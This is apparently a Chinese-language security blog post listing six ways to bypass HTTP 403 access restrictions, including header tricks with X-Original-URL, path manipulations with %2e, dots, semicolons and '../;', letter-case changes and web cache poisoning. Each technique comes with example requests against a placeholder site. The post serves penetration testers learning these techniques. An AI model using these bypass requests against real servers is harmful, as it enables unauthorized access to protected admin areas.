🚀 403 页面绕过技巧

  1. 🌐 使用 "X-Original-URL" 头:

    • 原理 :某些服务器在处理请求时,会检查 X-Original-URL 头部来确定请求的原始 URL。这种方法利用了服务器对 X-Original-URL 头部的信任,将其值设置为受限制的路径,从而绕过访问控制。

    • 原始请求:

      http 复制代码
      GET /admin HTTP/1.1
      Host: target.com
    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: target.com
      X-Original-URL: /admin
  2. ✨ 在第一个斜杠后添加 %2e

    • 原理%2e 是 URL 编码表示的点 (.),某些服务器可能会错误地解析它,导致忽略路径的一部分,从而访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/%2e/admin => 200
  3. 🛠 尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;):

    • 原理:一些服务器在处理路径时,可能会忽略或错误处理特殊字符,如点 (.)、斜杠 (/) 和分号 (;),从而允许访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/secret/. => 200
      http://target.com/secret//. => 200
      http://target.com/./secret/.. => 200
      http://target.com/;/secret => 200
      http://target.com/;//secret => 200
  4. 🗂 在目录名称后添加 ../;

    • 原理 :目录遍历攻击的一种变体,通过在路径中添加 ../;,可能会绕过服务器的访问控制检查,直接访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/admin../;
  5. 🔠 尝试将 URL 中的字母大写:

    • 原理:某些服务器对路径区分大小写,通过更改路径中某些字母的大小写,可能会绕过访问控制检查。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/aDmIN
  6. 📦 通过 Web 缓存中毒:

    • 原理:利用 Web 缓存服务器对请求头的信任,将受限制路径的值存入缓存中,从而在后续请求中绕过访问控制。

    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: victim.com
      X-Original-URL: /admin
相关推荐
leagsoft_10031 小时前
联软科技:以“韧性安全”守护数字世界,致敬抗战胜利80周年的坚韧精神
科技·安全
普通网友1 小时前
支持二次开发的代练App源码:订单管理、代练监控、安全护航功能齐全,一站式解决代练护航平台源码(PHP+ Uni-app)
安全·uni-app·php
Suckerbin1 小时前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全
厦门辰迈智慧科技有限公司3 小时前
水闸自动化监控系统解决方案
运维·服务器·物联网·安全·自动化·监测
房屋安全鉴定检测5 小时前
房屋安全鉴定注意事项
安全·网络安全
房屋安全鉴定检测5 小时前
房屋安全鉴定机构服务内容
安全·网络安全
碳水加碳水9 小时前
Java代码审计实战:XML外部实体注入(XXE)深度解析
java·安全·web安全·代码审计
打码人的日常分享13 小时前
运维服务方案,运维巡检方案,运维安全保障方案文件
大数据·运维·安全·word·安全架构
WhoisXMLAPI14 小时前
WhoisXML API再次荣登2025年美国Inc. 5000快速成长企业榜单
网络·安全
lingggggaaaa17 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache